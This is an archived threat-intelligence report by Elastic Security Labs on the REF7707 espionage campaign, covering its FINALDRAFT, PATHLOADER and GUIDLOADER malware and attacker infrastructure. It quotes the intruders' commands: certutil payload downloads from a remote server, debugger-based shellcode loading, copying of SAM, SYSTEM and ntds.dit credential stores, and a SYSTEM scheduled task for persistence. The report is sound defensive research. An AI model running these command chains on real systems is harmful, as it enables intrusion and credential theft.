{
	"id": "0aedcf35-3a00-441e-b1c6-c6b0e5263cac",
	"created_at": "2026-04-06T00:08:17.719765Z",
	"updated_at": "2026-04-10T03:33:36.972804Z",
	"deleted_at": null,
	"sha1_hash": "2f85c223c0a47f87a182fb85f751701bcdebbc8a",
	"title": "From South America to Southeast Asia: The Fragile Web of REF7707",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1218957,
	"plain_text": "From South America to Southeast Asia: The Fragile Web of REF7707\r\nBy Andrew Pease, Seth Goodwin\r\nPublished: 2025-02-13 · Archived: 2026-04-05 12:48:17 UTC\r\nREF7707 summarized\r\nElastic Security Labs has been monitoring a campaign targeting the foreign ministry of a South American nation that has\r\nlinks to other compromises in Southeast Asia. We track this campaign as REF7707.\r\nWhile the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign\r\nowners exhibited poor campaign management and inconsistent evasion practices.\r\nThe intrusion set utilized by REF7707 includes novel malware families we refer to as FINALDRAFT, GUIDLOADER, and\r\nPATHLOADER. We have provided a detailed analysis of their functions and capabilities in the malware analysis report of\r\nREF7707 - You've Got Malware: FINALDRAFT Hides in Your Drafts.\r\nKey takeaways\r\nREF7707 leveraged novel malware against multiple targets\r\nThe FINALDRAFT malware has both a Windows and Linux variant\r\nREF7707 used an uncommon LOLBin to obtain endpoint execution\r\nHeavy use of cloud and third-party services for C2\r\nThe attackers used weak operational security that exposed additional malware and infrastructure not used in this\r\ncampaign\r\nCampaign Overview\r\nIn late November 2024, Elastic Security Labs observed a tight cluster of endpoint behavioral alerts occurring at the Foreign\r\nMinistry of a South American country. 
As the investigation continued, we discovered a sprawling campaign and intrusion set\r\nthat included novel malware, sophisticated targeting, and a mature operating cadence.\r\nWhile parts of the campaign showed a high level of planning and technical competence, numerous tactical oversights\r\nexposed malware pre-production samples, infrastructure, and additional victims.\r\nCampaign layout (the diamond model)\r\nElastic Security Labs utilizes the Diamond Model to describe high-level relationships between adversaries, capabilities,\r\ninfrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions and\r\nleveraging Activity Threading (section 8) to create relationships between incidents, an adversary-centered (section 7.1.4)\r\napproach allows for a — although cluttered — single diamond.\r\nhttps://www.elastic.co/security-labs/fragile-web-ref7707\r\nPage 1 of 13\n\nREF7707 - Diamond Model\r\nExecution Flow\r\nPrimary execution chain\r\nREF7707 was initially identified through Elastic Security telemetry of a South American nation’s Foreign Ministry. We\r\nobserved a common LOLBin tactic using Microsoft’s certutil application to download files from a remote server and save\r\nthem locally.\r\ncertutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\\ProgramData\\fontdrvhost.exe\r\ncertutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\\ProgramData\\fontdrvhost.rar\r\ncertutil -urlcache -split -f https://[redacted]/config.ini C:\\ProgramData\\config.ini\r\ncertutil -urlcache -split -f https://[redacted]/wmsetup.log C:\\ProgramData\\wmsetup.log\r\nThe web server hosting fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log was located within the\r\nsame organization; however, it was not running the Elastic Agent. This was the first lateral movement observed and\r\nprovided insights about the intrusion. 
We’ll discuss these files in more detail, but for now, fontdrvhost.exe is a debugging\r\ntool, config.ini is a weaponized INI file, and fontdrvhost.rar was not recoverable.\r\nWinrsHost.exe\r\nWindows Remote Management’s Remote Shell plugin ( WinrsHost.exe ) was used to download the files to this system from\r\nan unknown source system on a connected network. The plugin is the client-side process used by Windows Remote\r\nManagement. It indicates that attackers already possessed valid network credentials and were using them for lateral\r\nmovement from a previously compromised host in the environment. How these credentials were obtained is unknown; it is\r\npossible that the credentials were obtained from the web server hosting the suspicious files.\r\nWinrsHost.exe is used to execute commands\r\nThe attacker downloaded fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log to the\r\nC:\\ProgramData\\ directory; from there, the attacker moved to several other Windows endpoints. While we can’t identify\r\nall of the exposed credentials, we noted the use of a local administrator account to download these files.\r\nFollowing the downloads from the web server to the endpoint, we saw a cluster of behavioral rules firing in quick\r\nsuccession.\r\nBehavioral rules accelerating\r\nOn six Windows systems, we observed the execution of an unidentified binary\r\n( 08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1 ) as a child of Services.exe . This suspicious\r\nbinary uses a pseudo-randomly assigned file name consisting of six camel case letters with a .exe extension and is located\r\nin the C:\\Windows\\ path (example: C:\\Windows\\cCZtzzwy.exe ). We could not collect this file for analysis, but we infer\r\nthat this is a variant of PATHLOADER based on the file size ( 170,495 bytes) and its location. 
This file was passed\r\nbetween systems using SMB.\r\nFontDrvHost.exe\r\nOnce the attacker collected fontdrvhost.exe , fontdrvhost.rar , config.ini , and wmsetup.log , it executed\r\nfontdrvhost.exe ( cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9 ) to continue with the\r\nintrusion. fontdrvhost.exe is a renamed version of the Windows-signed debugger CDB.exe . Abuse of this binary allowed\r\nour attackers to execute malicious shellcode delivered in the config.ini file under the guise of trusted binaries.\r\nCDB is a debugger that is over 15 years old. In researching how often it was submitted with suspicious files to VirusTotal,\r\nwe see increased activity in 2021 and an aggressive acceleration starting in late 2024.\r\nVirusTotal submissions and lookups for CDB.exe\r\nCDB is a documented LOLBas file, but there hasn’t been much published research on how it can be abused. Security\r\nresearcher mrd0x wrote a great analysis of CDB outlining how it can be used to run shellcode, launch executables, run\r\nDLLs, execute shell commands, and terminate security solutions (and even an older analysis from 2016 using it as a\r\nshellcode runner). While not novel, this is an uncommon attack methodology and could be used with other intrusion\r\nmetadata to link actors across campaigns.\r\nWhile config.ini was not collected for analysis, it contained a mechanism through which fontdrvhost.exe loaded\r\nshellcode; how it was invoked is similar to FINALDRAFT.\r\nC:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\r\n-cf - specifies the path and name of a script file. 
This script file is executed as soon as the debugger is started\r\nconfig.ini - this is the script to be loaded\r\n-o - debugs all processes launched by the target application\r\nThen fontdrvhost.exe spawned mspaint.exe and injected shellcode into it.\r\nShellcode injection into mspaint.exe\r\nElastic Security Labs reverse engineers analyzed this shellcode to identify and characterize the FINALDRAFT malware.\r\nFinally, fontdrvhost.exe injected additional shellcode into memory\r\n( 6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3 ) that was also identified as the FINALDRAFT\r\nmalware.\r\nAs described in the analysis of FINALDRAFT, the malware defaults to mspaint.exe or conhost.exe if no target\r\nparameter is provided for an injection-related command.\r\nConnectivity checks\r\nThe adversary performed several connectivity tests using the ping.exe command and via PowerShell.\r\nPowerShell’s Invoke-WebRequest cmdlet is similar to wget or curl in that it pulls down the contents of a web resource.\r\nThis cmdlet may be used to download tooling from the command line, but that was not the case here. 
These requests in\r\ncontext with several pings are more likely to be connectivity checks.\r\ngraph.microsoft[.]com and login.microsoftonline[.]com are legitimately owned Microsoft sites that serve API and\r\nweb GUI traffic for Microsoft’s Outlook cloud email service and other Office 365 products.\r\nping graph.microsoft[.]com\r\nping www.google[.]com\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://google[.]com\\\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://graph.microsoft[.]com\\\" -UseBasicParsing\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://login.microsoftonline[.]com\\\" -UseBasicParsing\r\ndigert.ictnsc[.]com and support.vmphere[.]com were adversary-owned infrastructure.\r\nping digert.ictnsc[.]com\r\nPowershell Invoke-WebRequest -Uri \\\"hxxps://support.vmphere[.]com\\\" -UseBasicParsing\r\nWe cover more about these network domains in the infrastructure section below.\r\nReconnaissance / enumeration / credential harvesting\r\nThe adversary executed an unknown script called SoftwareDistribution.txt using the diskshadow.exe utility, extracted\r\nthe SAM, SECURITY, and SYSTEM Registry hives, and copied the Active Directory database ( ntds.dit ). These\r\nmaterials primarily contain credentials and credential metadata. 
The adversary used the 7zip utility to compress the results:\r\ndiskshadow.exe /s C:\\\\ProgramData\\\\SoftwareDistribution.txt\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SAM C:\\\\ProgramData\\\\[redacted].local\\\\SAM /y\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SECURITY C:\\\\ProgramData\\\\[redacted].local\\\\SECURITY /y\r\ncmd.exe /c copy z:\\\\Windows\\\\System32\\\\config\\\\SYSTEM C:\\\\ProgramData\\\\[redacted].local\\\\SYSTEM /y\r\ncmd.exe /c copy z:\\\\windows\\\\ntds\\\\ntds.dit C:\\\\ProgramData\\\\[redacted].local\\\\ntds.dit /y\r\n7za.exe a [redacted].local.7z \\\"C:\\\\ProgramData\\\\[redacted].local\\\\\\\"\r\nThe adversary also enumerated information about the system and domain:\r\nsysteminfo\r\ndnscmd . /EnumZones\r\nnet group /domain\r\nC:\\\\Windows\\\\system32\\\\net1 group /domain\r\nquser\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\r\nreg query \\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\\\"\r\nreg query \\\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\UUID\\\"\r\nPersistence\r\nPersistence was achieved using a Scheduled Task that invoked the renamed CDB.exe debugger and the weaponized INI file\r\nevery minute as SYSTEM . 
This methodology ensured that FINALDRAFT resided in memory.\r\nschtasks /create /RL HIGHEST /F /tn \\\"\\\\Microsoft\\\\Windows\\\\AppID\\\\EPolicyManager\\\"\r\n/tr \\\"C:\\\\ProgramData\\\\fontdrvhost.exe -cf C:\\\\ProgramData\\\\config.ini -o C:\\\\ProgramData\\\\fontdrvhost.exe\\\"\r\n/sc MINUTE /mo 1 /RU SYSTEM\r\nschtasks - the Scheduled Task program\r\n/create - creates a new scheduled task\r\n/RL HIGHEST - specifies the run level of the job, HIGHEST runs as the highest level of privileges\r\n/F - suppress warnings\r\n/tn \\\\Microsoft\\\\Windows\\\\AppID\\\\EPolicyManager\\ - task name, attempting to mirror an authentic-looking\r\nscheduled task\r\n/tr \\\"C:\\\\ProgramData\\\\fontdrvhost.exe -cf C:\\\\ProgramData\\\\config.ini -o\r\nC:\\\\ProgramData\\\\fontdrvhost.exe\\\" - task to run, in this case the fontdrvhost.exe commands we covered\r\nearlier\r\n/sc MINUTE - schedule type, MINUTE specifies that the task runs at minute intervals\r\n/mo 1 - modifier, defines 1 for the schedule interval\r\n/RU SYSTEM - defines what account to run as; in this situation, the task will run as the SYSTEM user\r\nFINALDRAFT Analysis\r\nA technical deep-dive describing the capabilities and architecture of the FINALDRAFT and PATHLOADER malware is\r\navailable here. At a high level, FINALDRAFT is a well-engineered, full-featured remote administration tool with the ability\r\nto accept add-on modules that extend functionality and proxy network traffic internally by multiple means.\r\nAlthough FINALDRAFT can establish command and control using various means, the most notable is the one we\r\nobserved in our victim environment: abuse of Microsoft’s Graph API. We first observed this type of third-party C2 in\r\nSIESTAGRAPH, which we reported in December 2022.\r\nThis type of command and control is difficult to catch for defenders whose organizations depend heavily on network\r\nvisibility. 
Once the initial execution and check-in have been completed, all further communication proceeds through legitimate\r\nMicrosoft infrastructure ( graph.microsoft[.]com ) and blends in with the other organizational workstations. It also\r\nsupports relay functionality that enables it to proxy traffic for other infected systems. It evades defenses reliant on network-based intrusion detection and threat-intelligence indicators.\r\nPATHLOADER and GUIDLOADER\r\nBoth PATHLOADER and GUIDLOADER are used to download and execute encrypted shellcode in memory. They were\r\ndiscovered in VirusTotal while investigating the C2 infrastructure and strings identified within a FINALDRAFT memory\r\ncapture. They have only been observed in association with FINALDRAFT payloads.\r\nA May 2023 sample in VirusTotal is the earliest identified binary of the REF7707 intrusion set. This sample was first\r\nsubmitted by a web user from Thailand. dwn.exe\r\n( 9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf ) is a PATHLOADER variant that loads an\r\nencrypted FINALDRAFT binary from poster.checkponit[.]com and support.fortineat[.]com .\r\nBetween June and August of 2023, a Hong Kong VirusTotal web user uploaded 12 samples of GUIDLOADER. These\r\nsamples each had minor modifications to how the encrypted payload was downloaded and were configured to use\r\nFINALDRAFT domains:\r\nposter.checkponit[.]com\r\nsupport.fortineat[.]com\r\nGoogle Firebase ( firebasestorage.googleapis[.]com )\r\nPastebin ( pastebin[.]com )\r\nA Southeast Asian University public-facing web storage system\r\nSome samples of GUIDLOADER appear unfinished or broken, with non-functional decryption routines, while others\r\ncontain debug strings embedded in the binary. 
These variations suggest that the samples were part of a development and\r\ntesting process.\r\nFINALDRAFT bridging OS’\r\nIn late 2024, two Linux ELF FINALDRAFT variants were uploaded to VirusTotal, one from the United States and one from\r\nBrazil. These samples feature similar C2 versatility and a partial reimplementation of the commands available in the\r\nWindows version. URLs were pulled from these files for support.vmphere[.]com , update.hobiter[.]com , and\r\npastebin.com .\r\nInfrastructure Analysis\r\nIn the FINALDRAFT malware analysis report, several domains were identified in the samples collected in the REF7707\r\nintrusion, and other samples were identified through code similarity.\r\nService banner hashes\r\nA Censys search for hobiter[.]com (the domain observed in the ELF variant of FINALDRAFT, discussed in the previous\r\nsection) returns an IP address of 47.83.8.198 . This server is Hong Kong-based and is serving ports 80 and 443 . The\r\nstring “ hobiter[.]com ” is associated with the TLS certificate on port 443 . 
A Censys query pivot on the service banner\r\nhash of this port yields six additional servers that share that hash (seven total).\r\nIP | TLS Cert names | Cert CN | ports | ASN | GEO\r\n47.83.8.198 | *.hobiter[.]com | CloudFlare Origin Certificate | 80, 443 | 45102 | Hong Kong\r\n8.218.153.45 | *.autodiscovar[.]com | CloudFlare Origin Certificate | 53, 443, 2365, 3389, 80 | 45102 | Hong Kong\r\n45.91.133.254 | *.vm-clouds[.]net | CloudFlare Origin Certificate | 443, 3389 | 56309 | Nonthaburi, Thailand\r\n8.213.217.182 | *.ictnsc[.]com | CloudFlare Origin Certificate | 53, 443, 3389, 80 | 45102 | Bangkok, Thailand\r\n47.239.0.216 | *.d-links[.]net | CloudFlare Origin Certificate | 80, 443 | 45102 | Hong Kong\r\n203.232.112.186 | [NONE] | [NONE] | 80, 5357, 5432, 5985, 8000, 8080, 9090, 15701, 15702, 15703, 33990, 47001 | 4766 | Daejeon, South Korea\r\n13.125.236.162 | [NONE] | [NONE] | 80, 3389, 8000, 15111, 15709, 19000 | 16509 | Incheon, South Korea\r\nTwo servers ( 203.232.112[.]186 and 13.125.236[.]162 ) do not share the same profile as the other five. While the\r\nservice banner hash still matches, it is not on port 443 , but on ports 15701 , 15702 , 15703 , and 15709 . Further, the\r\nports in question do not appear to support TLS communications. 
We have not attributed them to REF7707 with a high\r\ndegree of confidence but are including them for completeness.\r\nThe other five servers, including the original “hobiter” server, share several similarities:\r\nService banner hash match on port 443\r\nSoutheast Asia geolocations\r\nWindows OS\r\nCloudflare issued TLS certs\r\nMost have the same ASN belonging to Alibaba\r\nHobiter and VMphere\r\nupdate.hobiter[.]com and support.vmphere[.]com were found in an ELF binary (biosets.rar) from December 13, 2024.\r\nBoth domains were registered over a year earlier, on September 12, 2023. This ELF binary features similar C2 versatility\r\nand a partial reimplementation of the commands available in the Windows version of FINALDRAFT.\r\nA name server lookup of hobiter[.]com and vmphere[.]com yields only a Cloudflare name server record for each and no\r\nA records. Searching for their known subdomains provides us with A records pointing to Cloudflare-owned IP addresses.\r\nICTNSC\r\nictnsc[.]com is directly associated with the REF7707 intrusion above from a connectivity check ( ping\r\ndigert.ictnsc[.]com ) performed by the attackers. The server associated with this domain ( 8.213.217[.]182 ) was\r\nidentified through the Censys service banner hash on the HTTPS service outlined above. Like the other identified\r\ninfrastructure, the subdomain resolves to Cloudflare-owned IP addresses, and the parent domain only has a Cloudflare NS\r\nrecord. 
ictnsc[.]com was registered on February 8, 2023.\r\nWhile we cannot confirm the association as malicious, it should be noted that the domain ict.nsc[.]ru is the Federal\r\nResearch Center for Information and Computational Technologies web property, often referred to as the FRC or the ICT.\r\nThis Russian organization conducts research in various areas like computer modeling, software engineering, data processing,\r\nartificial intelligence, and high-performance computing.\r\nWhile not observed in the REF7707 intrusion, the domain we observed ( ictnsc[.]com ) has an ict subdomain\r\n( ict.ictnsc[.]com ), which is strikingly similar to ict.nsc[.]ru . Again, while we cannot confirm whether they are related to the\r\nlegitimate FRC or ICT, it seems the threat actor intended for the domains to be similar, conflated, or confused with each\r\nother.\r\nAutodiscovar\r\nAutodiscovar[.]com has not been directly associated with any FINALDRAFT malware. It has been indirectly associated\r\nwith REF7707 infrastructure through pivots on web infrastructure identifiers. The parent domain only has a Cloudflare NS\r\nrecord. A subdomain identified through VirusTotal ( cloud.autodiscovar[.]com ) points to Cloudflare-owned IP addresses.\r\nThis domain name resembles other FINALDRAFT and REF7707 web infrastructure and shares the HTTPS service banner\r\nhash. This domain was registered on August 26, 2022.\r\nD-links and VM-clouds\r\nd-links[.]net and vm-clouds[.]net were both registered on September 12, 2023, the same day as hobiter[.]com and\r\nvmphere[.]com . The servers hosting these sites also share the same HTTPS service banner hash. They are not directly\r\nassociated with the FINALDRAFT malware nor have current routable subdomains, though pol.vm-clouds[.]net was\r\npreviously registered.\r\nFortineat\r\nsupport.fortineat[.]com was hard-coded in the PATHLOADER sample ( dwn.exe ). 
During our analysis of the domain,\r\nwe discovered that it was not currently registered. To identify any other samples communicating with the domain, our team\r\nregistered this domain and configured a web server to listen for incoming connections.\r\nWe recorded connection attempts over port 443 , where we identified a specific incoming byte pattern. The connections\r\nwere sourced from eight different telecommunications and Internet infrastructure companies in Southeast Asia, indicating\r\npossible victims of the REF7707 intrusion set.\r\nCheckponit\r\nposter.checkponit[.]com was observed in four GUIDLOADER samples and a PATHLOADER sample between May and\r\nJuly 2023, and it was used to host the FINALDRAFT encrypted shellcode. The checkponit[.]com registration was created\r\non August 26, 2022. There are currently no A records for checkponit[.]com or poster.checkponit[.]com .\r\nThird-party infrastructure\r\nMicrosoft’s graph.microsoft[.]com is used by the FINALDRAFT PE and ELF variants for command and control via the\r\nGraph API. This service is ubiquitous and used for critical business processes of enterprises using Office 365. Defenders are\r\nhighly encouraged to NOT block-list this domain unless business ramifications are understood.\r\nGoogle’s Firebase service ( firebasestorage.googleapis[.]com ), Pastebin ( pastebin[.]com ), and a Southeast Asian\r\nUniversity are third-party services used to host the encrypted payload for the loaders (PATHLOADER and GUIDLOADER)\r\nto download and decrypt the last stage of FINALDRAFT.\r\nREF7707 timeline\r\nConclusion\r\nREF7707 was discovered while investigating an intrusion of a South American nation's Foreign Ministry.\r\nThe investigation revealed novel malware like FINALDRAFT and its various loaders. 
These tools were deployed and\r\nsupported using built-in operating system features that are difficult for traditional anti-malware tools to detect.\r\nFINALDRAFT co-opts Microsoft’s graph API service for command and control to minimize malicious indicators that would\r\nbe observable to traditional network-based intrusion detection and prevention systems. Third-party hosting platforms for\r\nencrypted payload staging also challenge these systems early in the infection chain.\r\nAn overview of the VirusTotal submitters and pivots using the indicators in this report shows a relatively heavy geographic\r\npresence in Southeast Asia and South America. SIESTAGRAPH, similarly, was the first in-the-wild graph API abuse we had\r\nobserved, and it (REF2924) involved an attack on a Southeast Asian nation’s Foreign Ministry.\r\nAt Elastic Security Labs, we champion defensive capabilities across infosec domains operated by knowledgeable\r\nprofessionals to best mitigate advanced threats.\r\nREF7707 through MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nReconnaissance\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nDetecting REF7707\r\nYARA\r\nFINALDRAFT (Windows)\r\nFINALDRAFT (Linux)\r\nFINALDRAFT (Multi-OS)\r\nPATHLOADER\r\nGUIDLOADER\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable | Type | Name | Reference\r\n39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530 | SHA-256 | Session.x64.dll | FINALDRAFT\r\n83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c | SHA-256 | pfman | FINALDRAFT ELF\r\nf45661ea4959a944ca2917454d1314546cc0c88537479e00550eef05bed5b1b9 | SHA-256 | biosets.rar | FINALDRAFT ELF\r\n9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf | SHA-256 | dwn.exe | PATHLOADER\r\n41a3a518cc8abad677bb2723e05e2f052509a6f33ea75f32bd6603c96b721081 | SHA-256 | 5.exe | GUIDLOADER\r\nd9fc1cab72d857b1e4852d414862ed8eab1d42960c1fd643985d352c148a6461 | SHA-256 | 7.exe | GUIDLOADER\r\nf29779049f1fc2d45e43d866a845c45dc9aed6c2d9bbf99a8b1bdacfac2d52f2 | SHA-256 | 8.exe | GUIDLOADER\r\n17b2c6723c11348ab438891bc52d0b29f38fc435c6ba091d4464f9f2a1b926e0 | SHA-256 | 3.exe | GUIDLOADER\r\n20508edac0ca872b7977d1d2b04425aaa999ecf0b8d362c0400abb58bd686f92 | SHA-256 | 1.exe | GUIDLOADER\r\n33f3a8ef2c5fbd45030385b634e40eaa264acbaeb7be851cbf04b62bbe575e75 | SHA-256 | 1.exe | GUIDLOADER\r\n41141e3bdde2a7aebf329ec546745149144eff584b7fe878da7a2ad8391017b9 | SHA-256 | 11.exe | GUIDLOADER\r\n49e383ab6d092ba40e12a255e37ba7997f26239f82bebcd28efaa428254d30e1 | SHA-256 | 2.exe | GUIDLOADER\r\n5e3dbfd543909ff09e343339e4e64f78c874641b4fe9d68367c4d1024fe79249 | SHA-256 | 4.exe | GUIDLOADER\r\n7cd14d3e564a68434e3b705db41bddeb51dbb7d5425fd901c5ec904dbb7b6af0 | SHA-256 | 1.exe | GUIDLOADER\r\n842d6ddb7b26fdb1656235293ebf77c683608f8f312ed917074b30fbd5e8b43d | SHA-256 | 2.exe | GUIDLOADER\r\nf90420847e1f2378ac8c52463038724533a9183f02ce9ad025a6a10fd4327f12 | SHA-256 | 6.exe | GUIDLOADER\r\nposter.checkponit[.]com | domain-name | | REF7707 infrastructure\r\nsupport.fortineat[.]com | domain-name | | REF7707 infrastructure\r\nupdate.hobiter[.]com | domain-name | | REF7707 infrastructure\r\nsupport.vmphere[.]com | domain-name | | REF7707 infrastructure\r\ncloud.autodiscovar[.]com | domain-name | | REF7707 infrastructure\r\ndigert.ictnsc[.]com | domain-name | | REF7707 infrastructure\r\nd-links[.]net | domain-name | | REF7707 infrastructure\r\nvm-clouds[.]net | domain-name | | REF7707 infrastructure\r\n47.83.8[.]198 | ipv4-addr | | REF7707 infrastructure\r\n8.218.153[.]45 | ipv4-addr | | REF7707 infrastructure\r\n45.91.133[.]254 | ipv4-addr | | REF7707 infrastructure\r\n8.213.217[.]182 | ipv4-addr | | REF7707 infrastructure\r\n47.239.0[.]216 | ipv4-addr | | REF7707 infrastructure\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.elastic.co/security-labs/finaldraft\r\nhttps://mrd0x.com/the-power-of-cdb-debugging-tool/\r\nhttps://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\r\nAbout Elastic Security Labs\r\nElastic Security Labs is dedicated to creating positive change in the threat landscape by providing publicly available\r\nresearch on emerging threats.\r\nFollow Elastic Security Labs on X @elasticseclabs and check out our research at www.elastic.co/security-labs/. You can see\r\nthe technology we leveraged for this research and more by checking out Elastic Security.\r\nSource: https://www.elastic.co/security-labs/fragile-web-ref7707",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/fragile-web-ref7707"
	],
	"report_names": [
		"fragile-web-ref7707"
	],
	"threat_actors": [
		{
			"id": "dbee5a02-e2d6-49d2-9bb5-5a9e93fd1de9",
			"created_at": "2023-11-07T02:00:07.108976Z",
			"updated_at": "2026-04-10T02:00:03.411448Z",
			"deleted_at": null,
			"main_name": "REF2924",
			"aliases": [],
			"source_name": "MISPGALAXY:REF2924",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "68a86dfa-1a6d-4254-bd39-a9aa1129fdf5",
			"created_at": "2025-05-29T02:00:03.198435Z",
			"updated_at": "2026-04-10T02:00:03.855309Z",
			"deleted_at": null,
			"main_name": "REF7707",
			"aliases": [
				"CL-STA-0049",
				"Jewelbug"
			],
			"source_name": "MISPGALAXY:REF7707",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434097,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.pdf",
		"text": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.txt",
		"img": "https://archive.orkl.eu/2f85c223c0a47f87a182fb85f751701bcdebbc8a.jpg"
	}
}